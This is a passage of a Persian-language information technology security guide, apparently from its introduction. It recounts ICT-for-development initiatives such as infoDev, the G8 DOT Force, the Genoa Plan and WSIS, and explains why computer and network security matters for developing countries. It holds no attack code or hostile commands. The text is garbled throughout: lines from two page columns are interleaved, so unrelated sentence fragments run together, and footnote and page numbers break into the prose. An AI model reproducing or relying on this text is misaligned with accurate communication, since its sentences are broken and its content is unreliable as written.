‫ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳـﺎ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﻫـﻢ ﺭﺍ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻣــﺴﺎﺋﻞ ﺗــﺎﺯﻩﺍﻱ ﻧﻴــﺴﺘﻨﺪ‪ .‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭ ﹺ‬
‫ﻱ‬
‫ﺑﻴﺎﻣﻮﺯﻳﺪ‪ .‬ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﻇﻴﻔﺔ ﻫﺮ ﻓﺮﺩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﺰﺩﻳﻚ ﺑﻪ ﭘﻨﺠـﺎﻩ ﺳـﺎﻝ ﻗـﺪﻣﺖ ﺩﺍﺭﻧـﺪ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻓﺮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ‪ ،‬ﻛﺎﺭﺷﻨﺎﺱ ﻓﻨﻲ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴـﺴﺘﻢ‪،‬‬ ‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﻧﻴﺰ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭘﻮﻝ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣـﺎﻥ‬
‫ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ‪ ،‬ﻭ ﻣﺪﻳﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷـﺒﻜﻪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﺪ‪.‬‬ ‫ﺁﻏﺎﺯ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭﻱ ﻭ‬
‫ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ‪ ،‬ﺑﺮﺍﻱ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺍﺯ ﻃﺮﻳﻖ ﻧﻔـﻮﺫ‬
‫ﺍﻃﻤﻴﻨﺎﻥﺑﺨﺸﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﺩ ﻭ‬
‫ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﻗـﻮﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﮔﺎﻡ ﻣﻬﻤـﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺣﺘﻤـﺎﻝ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ‬
‫ﺩﺭ ﺟﻬﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺩﺭ ﺑﻴـﺸﺘﺮ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٤‬‬

‫ﭘﺮﻭﺭﺵ ﻛﺎﺭﺁﻓﺮﻳﻨﺎﻥ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﺁﻓﺮﻳﻨﻲ‬ ‫‪(۴‬‬ ‫ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤـﻦ‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ‬ ‫‪(۵‬‬ ‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻭ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫ﺩﺭ ﺷﺒﻜﻪ ﺑﺎ ﺳﺎﻳﺮﻳﻦ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻴﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﺩ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺑﻬﺪﺍﺷﺖ ﻭ ﺳﻼﻣﺖ‬ ‫‪(۶‬‬ ‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺯﻣﺎﻧﻲﺗﻬﻴﻪ ﺷﺪ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻣﻔﺎﻫﻴﻢ ﻣﺤﻠﻲ‬ ‫‪(۷‬‬ ‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤﺎﻋﻲ ﺑـﻪ ﺍﻭﺝ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩ‬
‫ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﺍﻳﺠﺎﺩ ﻛﻤﻴﺘﺔ ﺍﺟﺮﺍﻳﻲ ‪ ICT‬ﺩﺑﻴﺮ ﻛـﻞ‬ ‫ﺑﻮﺩ ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﻪ ﻣـﺪﺕ ‪ ۴۰‬ﺳـﺎﻝ ﻳـﺎ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻏﺎﻟـﺐ‬
‫ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ‪ ٤‬ﺑﻮﺩ ﻭ ﺍﺯ ﺩﻳﮕﺮ ﻧﺘـﺎﻳﺞ ﺁﻥ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺗـﺸﻜﻴﻞ‬ ‫ﻃﺮﺣﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻳﺎ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳـﺎﻧﻲ‬
‫ﻣﺆﺳﺴﺔ ﭘﻴﺸﮕﺎﻣﺎﻥ ﻓﺮﺻﺘﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ٥‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫ﺩﻭﻣﻨﻈﻮﺭﻩ ﻳﺎ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ‪ .‬ﺍﻳﻦ ﺑـﺎﻭﺭ‬
‫ﺍﺯ ﺍﻋﺘﺒﺎﺭ ‪ ،٦UNDP‬ﺑﻨﻴﺎﺩ ﺁﻛﺴﻨﭽﺮ‪ ٧‬ﻭ ﺑﻨﻴﺎﺩ ﻣﺎﺭﻛﻞ‪ ٨‬ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬ ‫ﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻳﻚ ﻣﻮﺿﻮﻉ ﻣﻬـﻢ ﻭ ﺣﻴـﺎﺗﻲ‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻣﻨﻈـﻮﺭﻩ ﺩﺭ ﻃﺮﺣﻬـﺎﻱ‬ ‫ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﺍﺳـﺖ ﻣﻮﺿـﻮﻋﻲ‬
‫ﺗﻮﺳــﻌﻪﺍﻱ ﺧــﻮﺩ ﺗﻮﺟــﻪ ﺭﻭﺯﺍﻓﺰﻭﻧــﻲ ﺑــﻪ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ‬ ‫ﻧﺴﺒﺘﹰﺎ ﺗﺎﺯﻩ ﻣﻲﺑﺎﺷﺪ ﻭ ﺷﺮﻭﻉ ﺁﻥ ﺑـﻪ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺒﻜﻪ ﺟﻬـﺎﻧﻲ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ‪ ITU‬ﻭ ‪ UNESCO‬ﻧﻴﺰ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ‪ ۹۰‬ﻣﻴﻼﺩﻱ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﻃﺮﺣﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﮔـﺰﺍﺭﻱ ﺩﻭ ﺍﺟـﻼﺱ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻧﺎﻣﻬـﺎﻱ‬ ‫ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﻳـﻚ ﻣﺆﺳـﺴﺔ ﭼﻨـﺪﻣﻨﻈﻮﺭﻩ ﺗﻮﺳـﻂ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺍﺟــﻼﺱ ﺟﻬــﺎﻧﻲ ﺳــﺮﺍﻥ ﺟﺎﻣﻌــﺔ ﺍﻃﻼﻋــﺎﺗﻲ )‪ ٩(WSIS‬ﺩﺭ ﮊﻧــﻮ‬ ‫‪ infoDev‬ﺩﺭ ﮔــﺮﻭﻩ ﺑﺎﻧــﻚ ﺟﻬــﺎﻧﻲ ﺩﺭ ﺳــﺎﻝ ‪ ۱۹۹۵‬ﻣــﻴﻼﺩﻱ‬
‫)ﺩﺳﺎﻣﺒﺮ ‪ (۲۰۰۳‬ﻭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳﻞ ‪ (۲۰۰۵‬ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ‪.‬‬ ‫ﺭﺳﻤﹰﺎ ﺍﻋﻼﻡ ﺷﺪ ﻭ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻜﺮﻱ ﺭﺋﻴﺲ ﻭﻗﺖ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬
‫ﺟﻴﻤﺰ ﻭﻟﻔﺴﻦ‪ ١‬ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﻮﺩ ﻛﻪ ﺑﺮ ﺍﻫﻤﻴﺖ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺷـﻜﻞ ﻏﻴﺮﻣـﺴﺘﻘﻴﻢ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫـﺪﺍﻑ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤـﺎﻋﻲ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻮﺳـﻌﻪﺍﻱ ﻫـﺰﺍﺭﻩ‬
‫ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺖ‪ .‬ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌﺪ ﺧﻮﺵﺑﻴﻨﻲ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫)‪ ١٠(MDG‬ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ‪ .‬ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﺻــﻠﻲ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴــﺖ‬
‫ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤﺎﻋﻲ ﺑﻴﺸﺘﺮ ﺷـﺪ ﻛـﻪ ﺑﺨـﺸﻲ ﺍﺯ ﺁﻥ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻧﻬـﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ﺑﺎﻋـﺚ‬
‫ﺩﻟﻴﻞ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﻮﺩ‪.‬‬
‫ﺗﻘﻮﻳﺖ ﺟﺮﻳﺎﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ‬
‫ﺧﻮﺍﻫﺪ ﺷﺪ ﻭ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎ ﺑﻪ ﻓﺮﺍﻫﻢ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ ﺑـﺮﺍﻱ‬ ‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﮔـﺮﻭﻩ ‪ ،G8‬ﻛﻤﻴﺘـﺔ ﻛـﺎﺭﻱ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲﺍﻧﺠﺎﻣﺪ‪.‬‬ ‫ﻓﺮﺻــﺘﻬﺎﻱ ﺩﻳﺠﻴﺘــﺎﻟﻲ )‪ ٢(DOT‬ﺭﺍ ﭘﺎﻳــﻪﺭﻳــﺰﻱ ﻛﺮﺩﻧــﺪ‪ .‬ﻛﻤﻴﺘــﺔ‬
‫‪ DOT‬ﻧﺘﺎﻳﺞ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﻃﻲ ﮔﺰﺍﺭﺷﻲ ﺍﺭﺍﺋـﻪ ﻧﻤـﻮﺩ ﻭ ﺧﻮﺍﺳـﺘﺎﺭ‬
‫ﺣﺎﻝ ﺍﻳﻦ ﺳﺆﺍﻝ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﭼﺮﺍ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻪ ﺩﺭ ﻭﻫﻠـﺔ‬
‫ﻗﺮﺍﺭﮔﺮﻓﺘﻦ ‪ ۹‬ﻣﻮﺿﻮﻉ ﺩﺭ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ ﮊﻧﻮ‪ ٣‬ﺷﺪ ﻛﻪ ﻫﻤـﺔ ﺁﻧﻬـﺎ‬
‫ﺍﻭﻝ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻧﮕﺎﺷـﺘﻪ‬
‫ﺩﺭ ﺍﺟــﻼﺱ ﺳــﺮﺍﻥ ﮊﻧــﻮ ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۱‬ﺑــﻪ ﺗﺄﻳﻴــﺪ ﻭ ﺍﻣــﻀﺎﻱ‬
‫ﺷﺪﻩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ .‬ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛـﻪ ﺍﺻـﻮﻝ‬
‫ﺭﻫﺒــﺮﺍﻥ ﮔــﺮﻭﻩ ‪ G8‬ﺭﺳــﻴﺪﻧﺪ‪ .‬ﺍﻋــﻀﺎﻱ ﺍﺻــﻠﻲ ﻛﻤﻴﺘــﺔ ‪DOT‬‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﻤﻮﺍﺭﻩ ﻳﻜﺴﺎﻧﻨﺪ؛ ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ‬
‫ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺍﺻﻠﻲ ﮔـﺮﻭﻩ ‪ G8‬ﻭ ﺩﻭﻟﺘﻬـﺎﻱ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‪ ،‬ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻳـﺎ ﺗﻮﺳـﻌﻪﻧﻴﺎﻓﺘـﻪ ﺑﺎﺷـﻴﺪ؛ ﭼﺮﺍﻛـﻪ‬
‫ﺗﻮﺳﻌﻪ‪ ،‬ﺑﺨﺸﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺒـﻮﻫﻲ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻫـﺮ ﮔﻮﺷـﺔ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﮔﺰﺍﺭﺵ ﻣﺰﺑـﻮﺭ ﺷـﺎﻣﻞ ‪ ۷‬ﺑﻨـﺪ‬
‫ﺟﻬﺎﻥ ﻇﺎﻫﺮ ﺷﻮﻧﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ‬
‫ﻋﻤﻠﻴــﺎﺗﻲ ﺑﻌﻨــﻮﺍﻥ ﻣﻮﺿــﻮﻋﺎﺕ ﺣﻴــﺎﺗﻲ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﺟﺎﻣﻌــﺔ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻲ ﺗﺮﺩﻳـﺪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻤﻴﺸﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫‪ (۱‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ‬
‫‪ (۲‬ﺍﺭﺗﻘﺎ ﻭ ﺑﻬﺒﻮﺩ ﺩﺳﺘﺮﺳﻲ‬
‫‪4‬‬ ‫‪U.N. Secretary General's ICT Task Force‬‬
‫‪ (۳‬ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ‬
‫‪5‬‬ ‫‪Global Digital Opportunities Initiative‬‬
‫‪6‬‬ ‫‪United Nations Development Program‬‬
‫‪7‬‬ ‫‪Accenture Foundation‬‬
‫‪8‬‬ ‫‪Markle Foundation‬‬ ‫‪1‬‬ ‫‪James Wolfensohn‬‬
‫‪9‬‬ ‫‪World Summit on Information Society‬‬ ‫‪2‬‬ ‫‪Digital Opportunity Taskforce Group‬‬
‫‪10‬‬ ‫‪Millennium Development Goals‬‬ ‫‪3‬‬ ‫‪Genoa Plan of Action‬‬
‫‪١٥‬‬ ‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬

‫ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺞ ﻧﺎﻣﻄﻠﻮﺑﻲ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ‪ .‬ﺩﻭﻟﺘﻬﺎ‬ ‫ﺍﺑﺘﺪﺍ ﺫﻛﺮ ﺍﻳﻦ ﻧﻜﺘﻪ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ‬
‫ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻋﻤﻮﻣﹰﺎ ﺗﻮﺍﻧـﺎﻳﻲ‬ ‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﻧﻘﺼﻬﺎﻳﻲ ﺭﺍ ﺩﺍﺭﻧﺪ‪ ،‬ﻭﻟـﻲ ﻧﺘـﺎﻳﺞ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﺮﻭﺯ‬ ‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﺗﻜﻨﻴﻜﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻧﻘــﺼﻬﺎ ﻭ ﺍﺷــﻜﺎﻻﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣــﺎﻝ ﺗﻮﺳــﻌﻪ‬ ‫ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﻧﻤﺎﻳـﺪ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻛﺘﺎﺑﻔﺮﻭﺷـﻲﻫـﺎ ﻭ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺧﻴﻢﺗﺮ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ‬ ‫ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‬
‫ﻫﻤﺔ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﺑﺎﺯﺍﺭﻫﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺩﻭﻟﺘﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ‬ ‫ﻭ ﻟﺬﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻫـﻢﺻـﻨﻒ ﺩﻳﮕـﺮ ﺑـﻪ ﺭﺍﺣﺘـﻲ‬
‫ﺗﻮﺳﻌﻪ ﺑﻪ ﺩﻟﻴـﻞ ﻋـﺪﻡ ﺗﻮﺟـﻪ ﺑـﻪ ﻋﻮﺍﻗـﺐ ﻧﺎﺷـﻲ ﺍﺯ ﻧﻔﻮﺫﻫـﺎﻱ‬ ‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺩﭼﺎﺭ ﺍﺷـﻜﺎﻝ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺠﻢ ﻭﺳﻴﻊ‪ ،‬ﻋﺪﻡ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺤﻠﻴﻞ ﺿـﺮﺭﻫﺎﻱ ﻣـﺎﻟﻲ‬ ‫ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﻏﻨﻲ ﺍﺯ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺍﻳﻦ ﺣﻤﻼﺕ‪ ،‬ﻭ ﻧﻴﺰ ﻧﺪﺍﺷﺘﻦ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺯﻣـﺎﻥ‬ ‫ﻛﻪ ﺍﺧﺒﺎﺭ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ ﺍﺭﺳـﺎﻝ ﻣـﻲﮔـﺮﺩﺩ‪.‬‬
